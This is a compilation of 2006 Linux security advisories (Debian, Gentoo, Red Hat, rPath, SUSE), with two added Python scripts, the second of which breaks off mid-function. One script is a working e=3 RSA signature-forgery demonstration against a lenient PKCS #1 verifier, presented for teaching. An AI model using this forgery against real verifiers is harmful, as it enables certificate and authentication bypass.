
Advisories, September 26, 2006

Debian GNU/Linux


Debian Security Advisory DSA 1184-2 [email protected]
http://www.debian.org/security/
Dann Frazier
September 26th, 2006 http://www.debian.org/security/faq


Package : kernel-source-2.6.8
Vulnerability : several
Problem type : remote
Debian-specific: no
CVE IDs : CVE-2004-2660 CVE-2005-4798 CVE-2006-1052 CVE-2006-1343
CVE-2006-1528 CVE-2006-1855 CVE-2006-1856 CVE-2006-2444
CVE-2006-2446 CVE-2006-2935 CVE-2006-2936 CVE-2006-3468
CVE-2006-3745 CVE-2006-4093 CVE-2006-4145 CVE-2006-4535
CERT advisory : VU#681569
BugTraq IDs : 17203 17830 18081 18099 18101 18105 18847 19033 19396
19562 19615 19666 20087

This advisory covers the S/390 components of the recent security
update for the Linux 2.6.8 kernel that was missing due to technical
problems. For reference below please see the original advisory
text.

Several security related problems have been discovered in the
Linux kernel which may lead to a denial of service or even the
execution of arbitrary code. The Common Vulnerabilities and
Exposures project identifies the following problems:

CVE-2004-2660

Toshihiro Iwamoto discovered a memory leak in the handling of
direct I/O writes that allows local users to cause a denial of
service.

CVE-2005-4798

A buffer overflow in NFS readlink handling allows a malicious
remote server to cause a denial of service.

CVE-2006-1052

Stephen Smalley discovered a bug in the SELinux ptrace handling
that allows local users with ptrace permissions to change the
tracer SID to the SID of another process.

CVE-2006-1343

Pavel Kankovsky discovered an information leak in the getsockopt
system call which can be exploited by a local program to leak
potentially sensitive memory to userspace.

CVE-2006-1528

Douglas Gilbert reported a bug in the sg driver that allows
local users to cause a denial of service by performing direct I/O
transfers from the sg driver to memory mapped I/O space.

CVE-2006-1855

Mattia Belletti noticed that certain debugging code left in the
process management code could be exploited by a local attacker to
cause a denial of service.

CVE-2006-1856

Kostik Belousov discovered a missing LSM file_permission check
in the readv and writev functions which might allow attackers to
bypass intended access restrictions.

CVE-2006-2444

Patrick McHardy discovered a bug in the SNMP NAT helper that
allows remote attackers to cause a denial of service.

CVE-2006-2446

A race condition in the socket buffer handling allows remote
attackers to cause a denial of service.

CVE-2006-2935

Diego Calleja Garcia discovered a buffer overflow in the DVD
handling code that could be exploited by a specially crafted DVD or
USB storage device to execute arbitrary code.

CVE-2006-2936

A bug in the serial USB driver has been discovered that could be
exploited by a custom made USB serial adapter to consume arbitrary
amounts of memory.

CVE-2006-3468

James McKenzie discovered a denial of service vulnerability in
the NFS driver. When exporting an ext3 file system over NFS, a
remote attacker could exploit this to trigger a file system panic
by sending a specially crafted UDP packet.

CVE-2006-3745

Wei Wang discovered a bug in the SCTP implementation that allows
local users to cause a denial of service and possibly gain root
privileges.

CVE-2006-4093

Olof Johansson discovered that the kernel did not disable the
HID0 bit on PowerPC 970 processors which could be exploited by a
local attacker to cause a denial of service.

CVE-2006-4145

A bug in the Universal Disk Format (UDF) filesystem driver could
be exploited by a local user to cause a denial of service.

CVE-2006-4535

David Miller reported a problem with the fix for CVE-2006-3745
that allows local users to crash the system via an SCTP socket
with a certain SO_LINGER value.

The following matrix explains which kernel version for which
architecture fixes the problem mentioned above:

                                 stable (sarge)
  Source                         2.6.8-16sarge5
  Alpha architecture             2.6.8-16sarge5
  AMD64 architecture             2.6.8-16sarge5
  HP Precision architecture      2.6.8-6sarge5
  Intel IA-32 architecture       2.6.8-16sarge5
  Intel IA-64 architecture       2.6.8-14sarge5
  Motorola 680x0 architecture    2.6.8-4sarge5
  PowerPC architecture           2.6.8-12sarge5
  IBM S/390                      2.6.8-5sarge5
  Sun Sparc architecture         2.6.8-15sarge5
  FAI                            1.9.1sarge4

Due to some internal problems kernel packages for the S/390 are
missing and will be provided later.

For the unstable distribution (sid) these problems have been
fixed in version 2.6.18-1.

We recommend that you upgrade your kernel package and reboot the
machine. If you have built a custom kernel from the kernel source
package, you will need to rebuild to take advantage of these
fixes.

Upgrade Instructions


wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge


Source archives:

    http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-s390_2.6.8-5sarge5.dsc
      Size/MD5 checksum:      846 1bcc93834f3d4ae2a83731ba2dab444c
    http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-s390_2.6.8-5sarge5.tar.gz
      Size/MD5 checksum:    13994 feb0f938746f52cf80597ef8ff5691fc

Architecture independent components:

    http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-patch-2.6.8-s390_2.6.8-5sarge5_all.deb
      Size/MD5 checksum:    12084 ab2e51bb8bbbbfcc392b725f955f96c0

IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-headers-2.6.8-3_2.6.8-5sarge5_s390.deb
      Size/MD5 checksum:  5087410 92c4b60e889e92f05f30214020b50955
    http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-3-s390_2.6.8-5sarge5_s390.deb
      Size/MD5 checksum:  2981914 f71d20cba548768ee4e44ffe28be947d
    http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-3-s390-tape_2.6.8-5sarge5_s390.deb
      Size/MD5 checksum:  1144574 7e3ae52a9d115cdca1c79d3946cd4e6c
    http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-3-s390x_2.6.8-5sarge5_s390.deb
      Size/MD5 checksum:  3189746 f1bd52a536ae5a13427c8b935bd81434

These files will probably be moved into the stable distribution
on its next update.


For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [email protected]
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

Gentoo Linux


Gentoo Linux Security Advisory GLSA 200609-14


http://security.gentoo.org/


Severity: Normal
Title: ImageMagick: Multiple Vulnerabilities
Date: September 26, 2006
Bugs: #144091, #143533
ID: 200609-14


Synopsis

Multiple buffer overflows have been discovered in ImageMagick,
which could potentially result in the execution of arbitrary
code.

Background

ImageMagick is a free software suite to manipulate, convert, and
create many image formats.

Affected packages


     Package                /  Vulnerable  /                Unaffected

  1  media-gfx/imagemagick      < 6.2.9.5                   >= 6.2.9.5

Description

Tavis Ormandy of the Google Security Team discovered a stack and
heap buffer overflow in the GIMP XCF Image decoder and multiple
heap and integer overflows in the SUN bitmap decoder. Damian Put
discovered a heap overflow in the SGI image decoder.

Impact

An attacker may be able to create a specially crafted image
that, when processed with ImageMagick, executes arbitrary code with
the privileges of the executing user.

Workaround

There is no known workaround at this time.

Resolution

All ImageMagick users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-gfx/imagemagick-6.2.9.5"

References

[ 1 ] CVE-2006-3743

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3743

[ 2 ] CVE-2006-3744

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3744

[ 3 ] CVE-2006-4144

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4144

Availability

This GLSA and any updates to it are available for viewing at the
Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200609-14.xml

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[email protected] or
alternatively, you may file a bug at http://bugs.gentoo.org.

License

Copyright 2006 Gentoo Foundation, Inc; referenced text belongs
to its owner(s).

The contents of this document are licensed under the Creative
Commons – Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


Gentoo Linux Security Advisory GLSA 200609-15


http://security.gentoo.org/


Severity: Normal
Title: GnuTLS: RSA Signature Forgery
Date: September 26, 2006
Bugs: #147682
ID: 200609-15


Synopsis

GnuTLS fails to handle excess data which could allow an attacker
to forge a PKCS #1 v1.5 signature.

Background

GnuTLS is an implementation of SSL 3.0 and TLS 1.0.

Affected packages


     Package          /  Vulnerable  /                      Unaffected

  1  net-libs/gnutls       < 1.4.4                            >= 1.4.4

Description

verify.c fails to properly handle excess data in the
digestAlgorithm.parameters field while generating a hash when using
an RSA key with exponent 3. RSA keys that use exponent 3 are
commonplace.

Impact

Remote attackers could forge PKCS #1 v1.5 signatures for RSA keys
with public exponent 3, which GnuTLS would accept as valid, so that
verification of X.509 and other certificates that use PKCS #1
signatures could be bypassed.
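As an added illustration (not part of the GLSA and not GnuTLS's own code), the following Python models the class of flaw described above: a PKCS #1 v1.5 verifier that parses the recovered block from the left and tolerates bytes it never checks. With e = 3, an attacker who knows only the public modulus can build a block of the right shape with a wide free region, take its integer cube root, and present that as the signature; the lenient verifier accepts it, while a verifier that rebuilds the whole encoded message and compares it byte for byte (RFC 3447, section 8.2.2) rejects it. The modulus is a constructed stand-in (a random odd 3072-bit integer), which suffices because neither the forgery nor verification ever uses a private key. The unchecked bytes here sit after the hash rather than inside digestAlgorithm.parameters as in the GnuTLS bug; it is the same error in a simpler position.

```python
"""PKCS #1 v1.5 signature forgery against a lenient verifier when e = 3.

Added example modelling the class of bug in GLSA 200609-15; not GnuTLS code.
"""
import hashlib
import random

E = 3
MODULUS_BITS = 3072
# DER-encoded DigestInfo prefix for SHA-1 (RFC 3447, section 9.2, note 1).
SHA1_DIGESTINFO_PREFIX = bytes.fromhex("3021300906052b0e03021a05000414")


def make_stand_in_modulus(bits=MODULUS_BITS, seed=2006):
    """Constructed stand-in for a public modulus (assumption, not a real key).

    The forgery uses only public values and the verifier only computes
    pow(s, E, n), so any odd n of the right size exhibits the flaw.
    """
    rng = random.Random(seed)
    return rng.getrandbits(bits) | (1 << (bits - 1)) | 1


def icbrt(x):
    """Floor of the integer cube root of a non-negative integer."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo


def encoded_message(sig, n):
    """RSAVP1 followed by I2OSP: recover the EM block the signature encodes."""
    k = (n.bit_length() + 7) // 8
    return pow(sig, E, n).to_bytes(k, "big")


def verify_lenient(sig, msg, n):
    """Flawed verifier: walks the block from the left and never looks at
    whatever follows the hash, so trailing bytes are silently accepted."""
    em = encoded_message(sig, n)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i < 10 or i >= len(em) or em[i] != 0x00:  # needs >= 8 bytes of 0xFF
        return False
    body = em[i + 1:]
    if not body.startswith(SHA1_DIGESTINFO_PREFIX):
        return False
    start = len(SHA1_DIGESTINFO_PREFIX)
    return body[start:start + 20] == hashlib.sha1(msg).digest()


def verify_strict(sig, msg, n):
    """RFC 3447 section 8.2.2: rebuild the entire expected EM and compare
    byte for byte, leaving no room for unchecked data anywhere."""
    em = encoded_message(sig, n)
    t = SHA1_DIGESTINFO_PREFIX + hashlib.sha1(msg).digest()
    if len(em) < len(t) + 11:
        return False
    expected = b"\x00\x01" + b"\xff" * (len(em) - len(t) - 3) + b"\x00" + t
    return em == expected


def forge_signature(msg, n):
    """Build 00 01 FF*8 00 DigestInfo(H(msg)) followed by a free region,
    then return the cube root of the largest integer with that prefix.
    s**3 is below the bound by less than 3*s**2 + 3*s + 1, far less than
    the width of the free region, so the prefix survives; and s**3 < n,
    so pow(s, 3, n) returns it unchanged."""
    k = (n.bit_length() + 7) // 8
    t = SHA1_DIGESTINFO_PREFIX + hashlib.sha1(msg).digest()
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + t
    upper = int.from_bytes(prefix + b"\xff" * (k - len(prefix)), "big")
    return icbrt(upper)


if __name__ == "__main__":
    n = make_stand_in_modulus()
    message = b"constructed sample: CN=not-really-the-CA"  # constructed input
    s = forge_signature(message, n)
    print("lenient verifier accepts forgery:", verify_lenient(s, message, n))  # True
    print("strict verifier accepts forgery: ", verify_strict(s, message, n))   # False
```

The forgery needs a modulus large enough that the free region exceeds roughly two thirds of the block, which is why 1024-bit keys were mostly out of reach in the original attack while 3072-bit and larger keys were not; the fix is never "check more of the block" but "compare the entire block".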

Workaround

There is no known workaround at this time.

Resolution

All GnuTLS users should upgrade to the latest version:

    # emerge --sync
    # emerge --update --ask --verbose ">=net-libs/gnutls-1.4.4"

References

[ 1 ] CVE-2006-4790

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4790

Availability

This GLSA and any updates to it are available for viewing at the
Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200609-15.xml

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[email protected] or
alternatively, you may file a bug at http://bugs.gentoo.org.

License

Copyright 2006 Gentoo Foundation, Inc; referenced text belongs
to its owner(s).

The contents of this document are licensed under the Creative
Commons – Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


Gentoo Linux Security Advisory GLSA 200609-16


http://security.gentoo.org/


Severity: High
Title: Tikiwiki: Arbitrary command execution
Date: September 26, 2006
Bugs: #145714
ID: 200609-16


Synopsis

Tikiwiki contains a cross-site scripting (XSS) vulnerability as
well as a second vulnerability which may allow remote execution of
arbitrary code.

Background

Tikiwiki is a web-based groupware and content management system,
developed with PHP, ADOdb and Smarty.

Affected packages


     Package            /  Vulnerable  /                    Unaffected

  1  www-apps/tikiwiki       < 1.9.5                          >= 1.9.5

Description

A vulnerability in jhot.php allows for an unrestricted file
upload to the img/wiki/ directory. Additionally, an XSS exists in
the highlight parameter of tiki-searchindex.php.

Impact

An attacker could execute arbitrary code with the rights of the
user running the web server by uploading a file and executing it
via a filepath parameter. The XSS could be exploited to inject and
execute malicious script code or to steal cookie-based
authentication credentials, potentially compromising the victim’s
browser.

Workaround

There is no known workaround at this time.

Resolution

All Tikiwiki users should upgrade to the latest version:

    # emerge --sync
    # emerge --oneshot --verbose --ask ">=www-apps/tikiwiki-1.9.5"

References

[ 1 ] CVE-2006-4299

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4299

[ 2 ] CVE-2006-4602

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4602

Availability

This GLSA and any updates to it are available for viewing at the
Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200609-16.xml

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[email protected] or
alternatively, you may file a bug at http://bugs.gentoo.org.

License

Copyright 2006 Gentoo Foundation, Inc; referenced text belongs
to its owner(s).

The contents of this document are licensed under the Creative
Commons – Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

Red Hat Linux


Red Hat Security Advisory

Synopsis: Moderate: squirrelmail security update
Advisory ID: RHSA-2006:0668-01
Advisory URL: https://rhn.redhat.com/errata/RHSA-2006-0668.html

Issue date: 2006-09-26
Updated on: 2006-09-26
Product: Red Hat Enterprise Linux
CVE Names: CVE-2006-4019


1. Summary:

A new squirrelmail package that fixes a security issue as well
as several bugs is now available for Red Hat Enterprise Linux 3 and
4.

This update has been rated as having moderate security impact by
the Red Hat Security Response Team.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AS version 3 – noarch
Red Hat Desktop version 3 – noarch
Red Hat Enterprise Linux ES version 3 – noarch
Red Hat Enterprise Linux WS version 3 – noarch
Red Hat Enterprise Linux AS version 4 – noarch
Red Hat Enterprise Linux Desktop version 4 – noarch
Red Hat Enterprise Linux ES version 4 – noarch
Red Hat Enterprise Linux WS version 4 – noarch

3. Problem description:

SquirrelMail is a standards-based webmail package written in
PHP.

A dynamic variable evaluation flaw was found in SquirrelMail.
Users who have an account on a SquirrelMail server and are logged
in could use this flaw to overwrite variables which may allow them
to read or write other users’ preferences or attachments.
(CVE-2006-4019)

Users of SquirrelMail should upgrade to this erratum package,
which contains SquirrelMail 1.4.8 to correct this issue. This
package also contains a number of additional patches to correct
various bugs.

Note: After installing this update, users are advised to restart
their httpd service to ensure that the new version functions
correctly.

4. Solution:

Before applying this update, make sure all previously released
errata relevant to your system have been applied.

This update is available via Red Hat Network. To use Red Hat
Network, launch the Red Hat Update Agent with the following
command:

up2date

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.

5. Bug IDs fixed (http://bugzilla.redhat.com/):

192236 – [Squirrelmail] sqspell_config.php not listed as a
config file
194457 – squirrelmail cannot handle multibyte characters in
attachment.
194598 – “Message Highlighting” help not translated in ja_JP
194599 – ja_JP help pages are garbled
195452 – squirrelmail view_text.php cannot handle multibyte
characters in attachment.
195639 – Squirrelmail file download issue on JP MS Windows XP.
196017 – squirrelmail cannot convert Subject to zen-kaku
kata-kana.
196117 – Wrong ja_JP translation for “refresh folder list”
202195 – CVE-2006-4019 Squirrelmail authenticated user variable
overwriting

6. RPMs required:

Red Hat Enterprise Linux AS version 3:

SRPMS:

ftp://updates.redhat.com/enterprise/3AS/en/os/SRPMS/squirrelmail-1.4.8-2.el3.src.rpm

ab9d7fa0864948074a24fbb0fac716e5
squirrelmail-1.4.8-2.el3.src.rpm

noarch:
0f4921da7a788f633aa016f993a9a9b6
squirrelmail-1.4.8-2.el3.noarch.rpm

Red Hat Desktop version 3:

SRPMS:

ftp://updates.redhat.com/enterprise/3desktop/en/os/SRPMS/squirrelmail-1.4.8-2.el3.src.rpm

ab9d7fa0864948074a24fbb0fac716e5
squirrelmail-1.4.8-2.el3.src.rpm

noarch:
0f4921da7a788f633aa016f993a9a9b6
squirrelmail-1.4.8-2.el3.noarch.rpm

Red Hat Enterprise Linux ES version 3:

SRPMS:

ftp://updates.redhat.com/enterprise/3ES/en/os/SRPMS/squirrelmail-1.4.8-2.el3.src.rpm

ab9d7fa0864948074a24fbb0fac716e5
squirrelmail-1.4.8-2.el3.src.rpm

noarch:
0f4921da7a788f633aa016f993a9a9b6
squirrelmail-1.4.8-2.el3.noarch.rpm

Red Hat Enterprise Linux WS version 3:

SRPMS:

ftp://updates.redhat.com/enterprise/3WS/en/os/SRPMS/squirrelmail-1.4.8-2.el3.src.rpm

ab9d7fa0864948074a24fbb0fac716e5
squirrelmail-1.4.8-2.el3.src.rpm

noarch:
0f4921da7a788f633aa016f993a9a9b6
squirrelmail-1.4.8-2.el3.noarch.rpm

Red Hat Enterprise Linux AS version 4:

SRPMS:

ftp://updates.redhat.com/enterprise/4AS/en/os/SRPMS/squirrelmail-1.4.8-2.el4.src.rpm

de02b249ec7954627c88123fbdf77e7b
squirrelmail-1.4.8-2.el4.src.rpm

noarch:
5a86f850038d3a2df211c29af5c9070c
squirrelmail-1.4.8-2.el4.noarch.rpm

Red Hat Enterprise Linux Desktop version 4:

SRPMS:

ftp://updates.redhat.com/enterprise/4Desktop/en/os/SRPMS/squirrelmail-1.4.8-2.el4.src.rpm

de02b249ec7954627c88123fbdf77e7b
squirrelmail-1.4.8-2.el4.src.rpm

noarch:
5a86f850038d3a2df211c29af5c9070c
squirrelmail-1.4.8-2.el4.noarch.rpm

Red Hat Enterprise Linux ES version 4:

SRPMS:

ftp://updates.redhat.com/enterprise/4ES/en/os/SRPMS/squirrelmail-1.4.8-2.el4.src.rpm

de02b249ec7954627c88123fbdf77e7b
squirrelmail-1.4.8-2.el4.src.rpm

noarch:
5a86f850038d3a2df211c29af5c9070c
squirrelmail-1.4.8-2.el4.noarch.rpm

Red Hat Enterprise Linux WS version 4:

SRPMS:

ftp://updates.redhat.com/enterprise/4WS/en/os/SRPMS/squirrelmail-1.4.8-2.el4.src.rpm

de02b249ec7954627c88123fbdf77e7b
squirrelmail-1.4.8-2.el4.src.rpm

noarch:
5a86f850038d3a2df211c29af5c9070c
squirrelmail-1.4.8-2.el4.noarch.rpm

These packages are GPG signed by Red Hat for security. Our key
and details on how to verify the signature are available from
https://www.redhat.com/security/team/key/#package

7. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4019

http://www.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <[email protected]>. More
contact details at https://www.redhat.com/security/team/contact/

Copyright 2006 Red Hat, Inc.

rPath Linux

rPath Security Advisory: 2006-0173-1
Published: 2006-09-26
Products: rPath Linux 1
Rating: Major
Exposure Level Classification: Indirect User Deterministic
Unauthorized Access
Updated Versions:
openoffice.org=/conary.rpath.com@rpl:devel//1/2.0.3-1.6-1

References:

    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2198

    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3117

    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2199

    https://issues.rpath.com/browse/RPL-475

Description:

Previous versions of the openoffice.org packages are susceptible
to several vulnerabilities, including a denial of service
(application crash) and a user-complicit unauthorized access attack
that enables an attacker to cause arbitrary code to be run. These
versions are not susceptible to CVE-2006-2199 because Java is not
enabled in those builds.

Because Java support could not be disabled in the initial
release of OpenOffice.org 2.0.3, and because Java support is not
included within rPath Linux 1, this update was delayed until
non-Java builds were re-enabled in OpenOffice.org.

SUSE Linux


SUSE Security Announcement

Package: gzip
Announcement ID: SUSE-SA:2006:056
Date: Tue, 26 Sep 2006 15:32:33 +0000
Affected Products: SLE SDK 10
                   SUSE LINUX 10.1
                   SUSE LINUX 10.0
                   SUSE LINUX 9.3
                   SUSE LINUX 9.2
                   SuSE Linux Desktop 1.0
                   SuSE Linux Enterprise Server 8
                   SUSE SLES 10
                   SUSE SLES 9
                   UnitedLinux 1.0
Vulnerability Type: remote system compromise
Severity (1-10): 6
SUSE Default Package: yes
Cross-References: CVE-2006-4334,CVE-2006-4335,CVE-2006-4336,
CVE-2006-4337,CVE-2006-4338

Content of This Advisory:

  1. Security Vulnerability Resolved: buffer overflows, infinite loops
     Problem Description
  2. Solution or Work-Around
  3. Special Instructions and Notes
  4. Package Location and Checksums
  5. Pending Vulnerabilities, Solutions, and Work-Arounds: none
  6. Authenticity Verification and Additional Information

1) Problem Description and Brief Discussion

The gzip tool does not handle some specific values correctly
when unpacking archives, which leads to vulnerabilities such as
buffer overflows or infinite loops.

Many different programs, such as mail clients and file managers,
use gzip; if a user can be deceived into unpacking an archive
supplied by an attacker, these bugs can lead to remote system
compromise.

Thanks to Tavis Ormandy, Google Security Team for informing us
about this issue.

2) Solution or Work-Around

There is no known work-around.

3) Special Instructions and Notes

none

4) Package Location and Checksums

The preferred method for installing security updates is to use
the YaST Online Update (YOU) tool. YOU detects which updates are
required and automatically performs the necessary steps to verify
and install them. Alternatively, download the update packages for
your distribution manually and verify their integrity by the
methods listed in Section 6 of this announcement. Then install the
packages using the command

rpm -Fhv <file.rpm>

to apply the update, replacing <file.rpm> with the
filename of the downloaded RPM package.

x86 Platform:

SUSE LINUX 10.1:

ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/gzip-1.3.5-159.5.i586.rpm

dc3d0d1fa04f309155188d456339e320

SUSE LINUX 10.0:

ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/gzip-1.3.5-144.2.i586.rpm

fa214e77cac58482b03a39aa3637402f

SUSE LINUX 9.3:

ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/gzip-1.3.5-140.2.i586.rpm

93c268c56d6f2bfb97fb1362440619ff

SUSE LINUX 9.2:

ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/gzip-1.3.5-139.2.i586.rpm

9ce8e3d5dda60f5c0226e1003555e7e3

Power PC Platform:

SUSE LINUX 10.1:

ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/gzip-1.3.5-159.5.ppc.rpm

e5216ebf301cc076117d24b1d641d666

SUSE LINUX 10.0:

ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/gzip-1.3.5-144.2.ppc.rpm

70fad9dec1124d6e2a18cddb56542e21

x86-64 Platform:

SUSE LINUX 10.1:

ftp://ftp.suse.com/pub/suse/update/10.1/rpm/x86_64/gzip-1.3.5-159.5.x86_64.rpm

bc88120404ee14a4f85869bf7b664c23

SUSE LINUX 10.0:

ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/gzip-1.3.5-144.2.x86_64.rpm

9bac8a94f263b70fcb0188b8fe61b51a

SUSE LINUX 9.3:

ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/gzip-1.3.5-140.2.x86_64.rpm

e99894cc66b479b026a8d6ab8f3d4bee

SUSE LINUX 9.2:

ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/gzip-1.3.5-139.2.x86_64.rpm

7f58b2c8124e895b5bbbf24e92f5701a

Sources:

SUSE LINUX 10.1:

ftp://ftp.suse.com/pub/suse/update/10.1/rpm/src/gzip-1.3.5-159.5.src.rpm

ccc806bead84a51395e24d03e1b08132

SUSE LINUX 10.0:

ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/gzip-1.3.5-144.2.src.rpm

8d38b0719a591ac7c41aa35062ca8f2e

SUSE LINUX 9.3:

ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/gzip-1.3.5-140.2.src.rpm

1c7511c702371171e4a940e6c6740c35

SUSE LINUX 9.2:

ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/gzip-1.3.5-139.2.src.rpm

81243003d7d3b397d7043a74059c5d7f

Our maintenance customers are notified individually. The
packages are offered for installation from the maintenance web:


http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/c9a04465aadc28a00f8e67df4a55f059.html


5) Pending Vulnerabilities, Solutions, and Work-Arounds:

none


6) Authenticity Verification and Additional Information

  • Announcement authenticity verification:

    SUSE security announcements are published via mailing lists and
    on Web sites. The authenticity and integrity of a SUSE security
    announcement is guaranteed by a cryptographic signature in each
    announcement. All SUSE security announcements are published with a
    valid signature.

    To verify the signature of the announcement, save it as text
    into a file and run the command

    gpg --verify <file>

    replacing <file> with the name of the file where you saved
    the announcement. The output for a valid signature looks like:

    gpg: Signature made <DATE> using RSA key ID 3D25D3D9
    gpg: Good signature from “SuSE Security Team <[email protected]>”

    where <DATE> is replaced by the date the document was
    signed.

    If the security team’s key is not contained in your key ring,
    you can import it from the first installation CD. To import the
    key, use the command

    gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc

  • Package authenticity verification:

    SUSE update packages are available on many mirror FTP servers
    all over the world. While this service is considered valuable and
    important to the free and open source software community, the
    authenticity and the integrity of a package needs to be verified to
    ensure that it has not been tampered with.

    There are two verification methods that can be used
    independently from each other to prove the authenticity of a
    downloaded file or RPM package:

    1. Using the internal gpg signatures of the rpm package
    2. MD5 checksums as provided in this announcement

    1. The internal rpm package signatures provide an easy way to
       verify the authenticity of an RPM package. Use the command

       rpm -v --checksig <file.rpm>

       to verify the signature of the package, replacing
       <file.rpm> with the filename of the RPM package downloaded.
       The package is unmodified if it contains a valid signature from
       [email protected] with the key ID
       9C800ACA. This key is automatically imported into the RPM database
       (on RPMv4-based distributions) and the gpg key ring of 'root'
       during installation. You can also find it on the first installation
       CD and at the end of this announcement.

    2. If you need an alternative means of verification, use the
      md5sum command to verify the authenticity of the packages. Execute
      the command

      md5sum <filename.rpm>

      after you downloaded the file from a SUSE FTP server or its
      mirrors. Then compare the resulting md5sum with the one that is
      listed in the SUSE security announcement. Because the announcement
      containing the checksums is cryptographically signed (by [email protected]), the checksums show
      proof of the authenticity of the package if the signature of the
      announcement is valid. Note that the md5 sums published in the SUSE
      Security Announcements are valid for the respective packages only.
      Newer versions of these packages cannot be verified.

  • SUSE runs two security mailing lists to which any interested
    party may subscribe:

        [email protected]

    • General Linux and SUSE security discussion.
      All SUSE security announcements are sent to this list. To
      subscribe, send an e-mail to

      <[email protected]>.

          [email protected]

    • SUSE’s announce-only mailing list.
      Only SUSE’s security announcements are sent to this list. To
      subscribe, send an e-mail to

      <[email protected]>.
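As an added example (not a tool shipped by Debian, SUSE or this page), the following Python script applies the checksum method from this section to a directory of downloaded packages. It parses the two layouts that appear above, Debian's "Size/MD5 checksum: SIZE MD5" line after each URL and SUSE's bare MD5 after each URL, matches entries to local files by basename, and reports each file as ok, missing, size mismatch or MD5 mismatch. The run_demo function builds constructed sample files and an advisory excerpt whose checksums are computed from those files (one file deliberately tampered, one absent); package names from this page are reused only as filenames, and the sample checksums are not the ones published above. Two caveats a practitioner would want: MD5 was already known to be collision-prone in 2006, so a matching sum carries only the trust of the GPG signature on the announcement it came from and says nothing about newer builds; and the package's own signature check (rpm --checksig, or apt's signed Release file on Debian) remains the primary control.

```python
"""Check downloaded update packages against the checksums in an advisory.

Added example, not a Debian or SUSE tool. Understands the two layouts on
this page: Debian's "URL / Size/MD5 checksum: SIZE MD5" pairs and SUSE's
"URL / blank line / MD5" pairs.
"""
import hashlib
import os
import re
import tempfile

DEBIAN_RE = re.compile(
    r"(?P<url>\w+://\S+)\s*\n\s*Size/MD5 checksum:\s*(?P<size>\d+)\s+(?P<md5>[0-9a-fA-F]{32})")
SUSE_RE = re.compile(r"(?P<url>\w+://\S+)\s*\n\s*(?P<md5>[0-9a-fA-F]{32})\b")


def parse_checksums(advisory_text):
    """Map each package basename to (md5_hex, expected_size_or_None)."""
    entries = {}
    for m in DEBIAN_RE.finditer(advisory_text):
        name = m.group("url").rsplit("/", 1)[-1]
        entries[name] = (m.group("md5").lower(), int(m.group("size")))
    for m in SUSE_RE.finditer(advisory_text):
        name = m.group("url").rsplit("/", 1)[-1]
        entries.setdefault(name, (m.group("md5").lower(), None))  # SUSE gives no size
    return entries


def md5_of_file(path):
    """Stream the file through MD5 so large kernel packages need little memory."""
    h = hashlib.md5()
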